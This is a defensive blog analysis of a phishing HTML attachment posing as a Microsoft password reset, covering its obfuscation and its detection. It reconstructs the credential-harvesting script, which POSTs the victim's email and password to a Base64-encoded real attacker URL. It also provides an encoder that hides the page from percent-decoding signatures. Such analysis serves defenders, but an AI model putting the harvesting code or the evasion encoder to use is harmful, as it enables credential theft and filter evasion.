Deconstructing a Phishing Attack: A Step-by-Step Analysis

In this article, we will explore a detailed analysis of a phishing attack, focusing on how a seemingly legitimate password reset request turned out to be a sophisticated phishing attempt. This case study not only reveals the techniques used by attackers but also demonstrates how such threats can be decoded and mitigated. Additionally, we will delve into the obfuscation techniques employed by the attackers to circumvent common attachment filters and cybersecurity detection mechanisms.

Introduction: The Phishing Attempt

The phishing attempt began when a victim received an email containing a file named Password_Reset.htm, purportedly from their organization’s IT department. The email urged the victim to reset their compromised password by opening the attached file. Upon opening the file, the victim was presented with what appeared to be a legitimate Microsoft login page, complete with their email address pre-populated.

Pride Security Cybersecurity Specialists

Initial Analysis of the Phishing File

The file Password_Reset.htm was designed to mimic an official Microsoft login page, making it difficult for the average user to identify it as fraudulent. However, an examination of the inner contents of the file revealed several red flags:

Obfuscated JavaScript Payload: The script carried a large encoded string that the loader code decodes and renders in the browser at run time, so the real login page is not visible in the file as delivered.

Pre-populated Email Address: The victim’s email was already filled in, which is a common tactic used by phishing scams to lend credibility to the fake page.

Encoded Variables: The HTML file contained JavaScript variables, some of which were encoded, likely to obscure their true purpose from both users and automated security tools.

Decoding the Phishing Payload

The first major step in deconstructing this phishing attempt was to decode the obfuscated payload. By examining the script, it became clear that a constant named returrn (the attacker's own, misspelled identifier) was derived from another constant x: x[0] returned the first element of an array holding the encoded payload, and that string was then passed through a replaceAll("%3%", "3") call, which substituted every instance of the placeholder %3% with the character 3.

Once the %3% placeholders had been restored, the script passed the result to the unescape() function, which turned the percent-encoded data into clear-text HTML and revealed the underlying malicious code. The placeholder step is what keeps unescape() (or a simple percent-decoding signature) from working on the file as delivered; the payload only becomes valid percent-encoded data after the substitution.

Examining the Decoded Phishing Payload

The decoded payload revealed a complete HTML structure, including all the CSS needed for the visual presentation and several JavaScript functions. A critical function identified in this payload was one that collected the user's input (email and password), formatted it into a JSON string, and sent it to a remote server with an HTTP POST request.

  • Key Information Captured:
    • #ai: Victim’s email address
    • #pr: Victim’s password
  • The POST target was stored as a Base64-encoded string. Decoding it yields https://ciepsa.net.br/a/c.php, a PHP endpoint designed to receive and presumably store the stolen credentials.
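The decoding steps described above, carried through end to end as an added example written for this article (this is not the phishing file and not the kit's own code). The raw payload is not reproduced on this page, so the sample below is a constructed stand-in that keeps only the details reported above (the #ai and #pr fields and the Base64-encoded POST target); it is turned into a delivered-looking payload with the inverse transformation (escape(), then hide every 3 behind %3%), which is an assumption about how the kit's encoder produced the file. The decoder then restores the placeholders, calls unescape(), and pulls the atob() literals and the harvested field ids out of the result. Run it with node.

```javascript
// Added example for this article: reproduces the two decoding steps the
// analysis identifies (placeholder restore, then unescape()) and extracts the
// exfiltration URL and harvested field ids from the decoded page.

// Constructed stand-in for the decoded (second-stage) page. The real file's
// HTML is not reproduced in the article; only #ai, #pr and the base64 string
// come from it. Everything else here is an assumption.
const SAMPLE_DECODED_HTML = `<html><body>
<form id="f">
  <input id="ai" value="victim@example.com">
  <input id="pr" type="password">
</form>
<script>
function send() {
  var u = atob("aHR0cHM6Ly9jaWVwc2EubmV0LmJyL2EvYy5waHA=");
  var d = JSON.stringify({
    ai: document.querySelector("#ai").value,
    pr: document.querySelector("#pr").value
  });
  fetch(u, { method: "POST", body: d });
}
</script>
</body></html>`;

// Inverse of the kit's decode step, used only to build a realistic input.
// Assumption: the encoder percent-escaped the page with escape() and then hid
// every "3" behind the "%3%" placeholder, so "%3C" becomes "%%3%C" and a plain
// unescape() (or a signature on "%3Chtml%3E") no longer matches the file.
function obfuscate(html) {
  return escape(html).replaceAll("3", "%3%");
}

// The two steps the article identifies in the loader script.
function decodePayload(obfuscated) {
  const percentEncoded = obfuscated.replaceAll("%3%", "3"); // restore the placeholder
  return unescape(percentEncoded);                          // then decode as the kit does
}

// Every literal handed to atob(), decoded; the exfiltration URL shows up here.
function extractAtobStrings(html) {
  const re = /atob\(\s*["']([A-Za-z0-9+/=]+)["']\s*\)/g;
  return [...html.matchAll(re)].map((m) => Buffer.from(m[1], "base64").toString("utf8"));
}

// Element ids read through document.querySelector("#..."): the harvested fields.
function harvestedFieldIds(html) {
  const re = /querySelector\(\s*["']#([A-Za-z0-9_-]+)["']\s*\)/g;
  return [...new Set([...html.matchAll(re)].map((m) => m[1]))];
}

// Build the delivered form of the sample, decode it, and summarise the findings.
function analyzeSample() {
  const delivered = obfuscate(SAMPLE_DECODED_HTML);
  const decoded = decodePayload(delivered);
  return {
    roundTripOk: decoded === SAMPLE_DECODED_HTML,
    exfilUrls: extractAtobStrings(decoded),
    harvestedFields: harvestedFieldIds(decoded),
  };
}

console.log(JSON.stringify(analyzeSample(), null, 2));
```

Do the decoding in a scratch script like this rather than by opening the attachment in a browser: the decoded page still contains the live harvesting function, and a browser would happily run it. The extraction regexes are deliberately narrow (a literal string inside atob() or querySelector()); a kit that assembles those strings at run time will slip past them, which is exactly why the article's later point about dynamic analysis matters.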

Resolving the Malicious URL

Further investigation into the URL revealed that it resolved to the IP address 15.235.14.75, associated with a now-suspended website hosted on servidorsaturno.com.br. Packet analysis of fake details entered into the malicious form confirmed that the form was indeed sending POST requests to the server, which was actively receiving the credentials sent by the phishing script. Note that the resolution and hosting details are point-in-time observations: the IP can be reassigned and the domain can move, so detections and blocks should be built on the URL and domain rather than on the IP alone.

Obfuscation Techniques: Circumventing Detection Mechanisms

One of the key reasons this phishing attempt was able to bypass common cybersecurity defenses was due to the sophisticated obfuscation techniques employed by the attackers. These techniques are designed to hide the malicious intent of the script from both automated security tools and manual inspection. Here’s how they worked:

a. Base64 Encoding

The attackers used Base64 encoding to disguise URLs and sensitive parts of the code. Base64 encoding is a method of converting binary data into an ASCII string format. While this technique is commonly used for legitimate purposes, such as encoding data for transmission over the web, it is also frequently used by attackers to obfuscate malicious code.

In this case, the URL where the stolen credentials were sent was Base64 encoded as aHR0cHM6Ly9jaWVwc2EubmV0LmJyL2EvYy5waHA=. When decoded, it translated to https://ciepsa.net.br/a/c.php. By encoding the URL, the attackers made it less likely that a simple string match or URL-reputation check on the file itself would recognize the known malicious site.

b. JavaScript Obfuscation

The JavaScript in the phishing file was intentionally written in a convoluted manner. For example, the use of complex variable names, unnecessary calculations, and encoding of certain characters within the script made it difficult for automated analysis tools to decipher the code’s true purpose.

Obfuscation of JavaScript can include techniques such as:

  • Variable Renaming: Changing variable names to nonsensical or misleading labels.
  • Code Flattening (minification): Collapsing multiple lines of code into a single line, which reduces readability.
  • String Manipulation: Encoding strings or breaking them into parts that are reassembled at runtime.

These techniques reduce the chances of the script being flagged by static analysis tools that look for patterns of known malicious behavior.

c. Dynamic Content Replacement

The script utilized dynamic content replacement, such as the replaceAll("%3%", "3") call, which restored the encoded placeholders to their actual values at run time. This means that until the script is executed, the true content remains hidden. Many security tools that scan attachments do not execute scripts in a dynamic environment, allowing such obfuscated scripts to pass through undetected.
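As an added example that is not from the original article, the following static triage checks turn the three obfuscation techniques above (Base64 URL, convoluted JavaScript, run-time placeholder substitution) into something a mail gateway or an analyst script can run over an attachment before any dynamic analysis. The indicator names, the thresholds and the three sample attachments are constructed for this example; the Base64 string is the one reported above.

```javascript
// Added example for this article: static triage heuristics for .htm/.html
// attachments. Each indicator is a cheap textual check; the score is the
// number of indicators that fired. Names and thresholds are assumptions made
// for this example, not vendor rules.
const INDICATORS = [
  {
    name: "unescape-or-decodeURI-call",
    test: (html) => /\b(unescape|decodeURIComponent|decodeURI)\s*\(/.test(html),
  },
  {
    // e.g. .replaceAll("%3%", "3"): a percent-delimited token swapped back at run time
    name: "placeholder-replaceAll",
    test: (html) => /\.replaceAll\(\s*["']%[^"'%]{1,8}%["']/.test(html),
  },
  {
    // A quoted literal of 40+ chars where more than 20% of the characters are
    // '%' is a percent-encoded blob (mangled or not); legitimate pages rarely have one.
    name: "percent-dense-literal",
    test: (html) => {
      for (const m of html.matchAll(/["']([^"'\n]{40,})["']/g)) {
        const s = m[1];
        if ((s.match(/%/g) || []).length / s.length > 0.2) return true;
      }
      return false;
    },
  },
  { name: "document-write", test: (html) => /document\.write\s*\(/.test(html) },
  {
    // A base64 literal passed to atob() that decodes to an http(s) URL.
    name: "base64-literal-decodes-to-url",
    test: (html) => {
      for (const m of html.matchAll(/atob\(\s*["']([A-Za-z0-9+/=]{8,})["']\s*\)/g)) {
        const decoded = Buffer.from(m[1], "base64").toString("utf8");
        if (/^https?:\/\//.test(decoded)) return true;
      }
      return false;
    },
  },
  {
    name: "password-field-with-network-send",
    test: (html) =>
      /type\s*=\s*["']password["']/i.test(html) && /\b(fetch|XMLHttpRequest)\b/.test(html),
  },
];

function triageHtmlAttachment(html) {
  const fired = INDICATORS.filter((i) => i.test(html)).map((i) => i.name);
  return { score: fired.length, indicators: fired };
}

// Constructed loader in the shape the article describes: an array holding the
// placeholder-mangled, percent-encoded page, restored and rendered at run time.
const LOADER_SAMPLE = `<html><body><script>
const x = ["%%3%Chtml%%3%E%%3%Cbody%%3%E%%3%Cform%%3%E%%3%C/form%%3%E%%3%C/body%%3%E%%3%C/html%%3%E"];
const returrn = x[0].replaceAll("%3%", "3");
document.write(unescape(returrn));
</script></body></html>`;

// Constructed stand-in for the second stage (the decoded page) with the
// harvesting call the article describes.
const DECODED_STAGE_SAMPLE = `<input id="ai"><input id="pr" type="password">
<script>fetch(atob("aHR0cHM6Ly9jaWVwc2EubmV0LmJyL2EvYy5waHA="), {method:"POST",
body: JSON.stringify({ai: document.querySelector("#ai").value, pr: document.querySelector("#pr").value})});</script>`;

// Constructed benign attachment: a plain HTML note with a link.
const BENIGN_SAMPLE = `<html><body><h1>Quarterly newsletter</h1>
<p>Read the full update at <a href="https://intranet.example.com/newsletter/2024-q3">the intranet</a>.</p>
</body></html>`;

for (const [label, html] of [
  ["loader", LOADER_SAMPLE],
  ["decoded stage", DECODED_STAGE_SAMPLE],
  ["benign", BENIGN_SAMPLE],
]) {
  console.log(label, triageHtmlAttachment(html));
}
```

The loader sample fires four indicators without any of its content being decoded, and the decoded stage fires two more, so the checks are worth running at both stages of an investigation. They are evasion-prone by construction (a kit that builds its strings from character codes, or calls unescape through an alias, will score zero), which is why they belong in front of, not instead of, the dynamic analysis the article recommends.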

Conclusion: Understanding the Phishing Mechanism

This phishing file was constructed to look indistinguishable from a legitimate Microsoft login page. The attackers employed multiple layers of obfuscation, including Base64 encoding, complex JavaScript obfuscation, and dynamic content replacement, to hide the true nature of the file from casual inspection and security software.

Once the victim entered their credentials, the data was sent to a PHP script on a remote server, which likely stored the information for future malicious use. This case highlights the importance of vigilance and the need for advanced security tools capable of detecting such well-disguised threats.

This phishing file was likely generated automatically using a phishing toolkit, which allowed the attacker to input a list of emails and launch a large-scale attack with minimal effort.

Mitigation and Prevention

To prevent falling victim to such attacks:

  • Always verify the authenticity of unsolicited emails, especially those requesting sensitive information or urging an immediate password reset.
  • Hover over links to check their actual destination before clicking. Treat HTML attachments (.htm/.html) with the same suspicion: they open locally in the browser, so there is no link to hover over, and a login page loaded from a file:// path is never a legitimate Microsoft sign-in.
  • Use advanced email filtering and security solutions that can detect obfuscated code and phishing attempts, and consider blocking or quarantining HTML attachments at the gateway where the business does not need them.
  • Employ dynamic analysis tools that can execute scripts in a safe environment to detect malicious behavior, since static scanning alone will not see content that is only assembled at run time.

Understanding the inner workings of phishing attacks, as demonstrated in this analysis, is crucial for both IT professionals and end-users to better defend against such threats. The use of obfuscation techniques, while sophisticated, is not foolproof, and with the right knowledge and tools, these attacks can be detected and prevented.

By breaking down this phishing attack and examining the obfuscation techniques used, we can better educate others on the dangers lurking in seemingly legitimate emails and how to protect against them.
